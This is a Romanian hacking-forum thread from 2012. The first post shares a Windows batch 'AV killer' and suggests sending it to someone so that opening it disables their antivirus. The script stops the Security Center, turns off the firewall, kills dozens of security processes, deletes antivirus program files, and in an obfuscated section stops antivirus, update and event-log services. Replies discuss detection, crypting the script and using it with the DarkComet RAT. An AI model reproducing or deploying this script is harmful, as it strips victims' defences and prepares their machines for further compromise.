shadyRO Posted April 7, 2012 Report Posted April 7, 2012 Salvati asta cu .bat , deschide sau trimite asta la cineva si la deschidere iti sterge av.@ echo offrem ---------------------------------rem Permanently Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill /A F-*tskill /A ESAFEtskill /A cleclstskill /A BLACKICEtskill /A def*tskill /A kavtskill /A kav*tskill /A avg*tskill /A ash*clstskill /A aswupdsvtskill /A ewid*tskill /A guard*tskill /A guar*tskill /A gcasDt*tskill /A msmp*clstskill /A mcafe*tskill /A mghtmltskill /A msiexectskill /A outposttskill /A isafetskill /A zap*clstskill /A zauinsttskill /A upd*tskill /A zlclien*tskill /A minilogtskill /A cc*tskill /A norton*clstskill /A norton au*tskill /A ccc*tskill /A npfmn*tskill /A loge*tskill /A nisum*tskill /A issvctskill /A tmp*clstskill /A tmn*tskill /A pcc*tskill /A cpd*tskill /A pop*tskill /A pav*tskill /A padminclstskill /A panda*tskill /A avsch*tskill /A sche*tskill /A syman*tskill /A virus*tskill /A realm*clstskill /A sweep*tskill /A scan*tskill /A ad-*tskill /A safe*tskill /A avas*tskill /A norm*clstskill /A offg*del /Q /F C:\Program Files\alwils~1\avast4\*.*del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exedel /Q /F C:\Program Files\kasper~1\*.execlsdel /Q /F C:\Program Files\trojan~1\*.exedel /Q /F C:\Program Files\f-prot95\*.dlldel /Q /F C:\Program Files\tbav\*.datclsdel /Q /F C:\Program Files\avpersonal\*.vdfdel /Q /F C:\Program Files\Norton~1\*.cntdel /Q /F C:\Program Files\Mcafee\*.*clsdel /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\*.*del /Q /F C:\Program Files\Norton~1\*.*clsdel /Q /F C:\Program Files\avgamsr\*.exedel /Q /F C:\Program Files\avgamsvr\*.exedel /Q /F C:\Program Files\avgemc\*.execlsdel /Q /F C:\Program Files\avgcc\*.exedel /Q /F C:\Program Files\avgupsvc\*.exedel /Q /F C:\Program Files\grisoftdel /Q /F C:\Program Files\nood32krn\*.exedel /Q /F C:\Program Files\nood32\*.execlsdel /Q /F C:\Program Files\nod32del /Q /F C:\Program Files\nood32del /Q /F C:\Program Files\kav\*.exedel /Q /F C:\Program Files\kavmm\*.exedel /Q /F C:\Program Files\kaspersky\*.*clsdel /Q /F C:\Program Files\ewidoctrl\*.exedel /Q /F C:\Program Files\guard\*.exedel /Q /F C:\Program Files\ewido\*.execlsdel /Q /F C:\Program Files\pavprsrv\*.exedel /Q /F C:\Program Files\pavprot\*.exedel /Q /F C:\Program Files\avengine\*.execlsdel /Q /F C:\Program Files\apvxdwin\*.exedel /Q /F C:\Program Files\webproxy\*.exedel /Q /F C:\Program Files\panda software\*.*rem ---------------------------------rem ---------------------------------rem Temp Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill /A F-*tskill /A ESAFEtskill /A cleclstskill /A BLACKICEtskill /A def*tskill /A kavtskill /A kav*tskill /A avg*tskill /A ash*clstskill /A aswupdsvtskill /A ewid*tskill /A guard*tskill /A guar*tskill /A gcasDt*tskill /A msmp*clstskill /A mcafe*tskill /A mghtmltskill /A msiexectskill /A outposttskill /A isafetskill /A zap*clstskill /A zauinsttskill /A upd*tskill /A zlclien*tskill /A minilogtskill /A cc*tskill /A norton*clstskill /A norton au*tskill /A ccc*tskill /A npfmn*tskill /A loge*tskill /A nisum*tskill /A issvctskill /A tmp*clstskill /A tmn*tskill /A pcc*tskill /A cpd*tskill /A pop*tskill /A pav*tskill /A padminclstskill /A panda*tskill /A avsch*tskill /A sche*tskill /A syman*tskill /A virus*tskill /A realm*clstskill /A sweep*tskill /A scan*tskill /A ad-*tskill /A safe*tskill /A avas*tskill /A norm*clstskill /A offg*rem ---------------------------------rem ---------------------------------rem Encripted AV Killerdel /F /Q %SystemDrive%\recycler\S-1-5-21-1202660629-261903793-725345543-1003\run.batset ii=neset ywe=stset ury=tset iej=opset jt53=Symaset o6t=norset lyd2=feeset h3d=tonset gf45=ntecset own5=McA%ii%%ury% %ywe%%iej% "Security Center" /y%ii%%ury% %ywe%%iej% "Automatic Updates" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y%ii%%ury% %ywe%%iej% "SAVScan" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /ycls%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y%ii%%ury% %ywe%%iej% navapsvc /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y%ii%%ury% %ywe%%iej% vrmonsvc /y%ii%%ury% %ywe%%iej% MonSvcNT /y%ii%%ury% %ywe%%iej% SAVScan /y%ii%%ury% %ywe%%iej% NProtectService /y%ii%%ury% %ywe%%iej% ccSetMGR /y%ii%%ury% %ywe%%iej% ccEvtMGR /y%ii%%ury% %ywe%%iej% srservice /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y%ii%%ury% %ywe%%iej% MskService /y%ii%%ury% %ywe%%iej% MpfService /y%ii%%ury% %ywe%%iej% mcupdmgr.exe /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y%ii%%ury% %ywe%%iej% helpsvc /y%ii%%ury% %ywe%%iej% ERSvc /y%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /ycls%ii%%ury% %ywe%%iej% ccPwdSvc /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y%ii%%ury% %ywe%%iej% navapsvc /y%ii%%ury% %ywe%%iej% "Serv-U" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y%ii%%ury% %ywe%%iej% "NAV Alert" /y%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /ycls%ii%%ury% %ywe%%iej% "McShield" /y%ii%%ury% %ywe%%iej% "DefWatch" /y%ii%%ury% %ywe%%iej% eventlog /y%ii%%ury% %ywe%%iej% InoRPC /y%ii%%ury% %ywe%%iej% InoRT /y%ii%%ury% %ywe%%iej% InoTask /ycls%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y%ii%%ury% %ywe%%iej% "SyGateService" /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /ycls%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /ycls%ii%%ury% %ywe%%iej% netsvcs%ii%%ury% %ywe%%iej% spoolntrem --------------------------------- Quote
MARIUSCS Posted April 7, 2012 Report Posted April 7, 2012 (edited) Pai asta chiar nu e cine stie ce...M-am uitat din mare si din cate am vazut nu e valabil chiar pentru orice av.L.E:e detectat codu:(Ce ghinion pe tine:( Edited April 7, 2012 by MARIUSCS Quote
Maximus Posted April 14, 2012 Report Posted April 14, 2012 asta mergea pe vreamea cand kaspersky nu avea proactive defense .. etc Quote
Endakin Posted April 17, 2012 Report Posted April 17, 2012 merge cu darckcomet upload & runnu chiar pe orice antivirus Quote
Moderators Dragos Posted April 17, 2012 Moderators Report Posted April 17, 2012 Batch-ul acesta este public pe Internet de ani de zile, normal ca este detectat si de cel mai simplu antivirus. Quote
Fitty Posted April 17, 2012 Report Posted April 17, 2012 Frate, chiar va asteptati ca un antivirus sa isi dea unload la taskkill ? )))) Quote
gogusan Posted April 19, 2012 Report Posted April 19, 2012 Daca-l criptam?eu zic sa-l zeroizezi, sigur va avea detectii ZERO.sau mai bine incearca cu: Quote
chioara3 Posted June 5, 2012 Report Posted June 5, 2012 dracu mura in gura vreti.. e detectat codu, vai. criptatil draq mura in gura ca la aia de 2 ani.PS: Deaia nu o sa stiti sa faceti nimic. Quote
LLegoLLaS Posted June 5, 2012 Report Posted June 5, 2012 ba nu mai e 2003.Toti antivirusii au fisiere .sys si servicii create.Incearca tu sa dai close process la ESS3,4,5 sau avira sau orice. Quote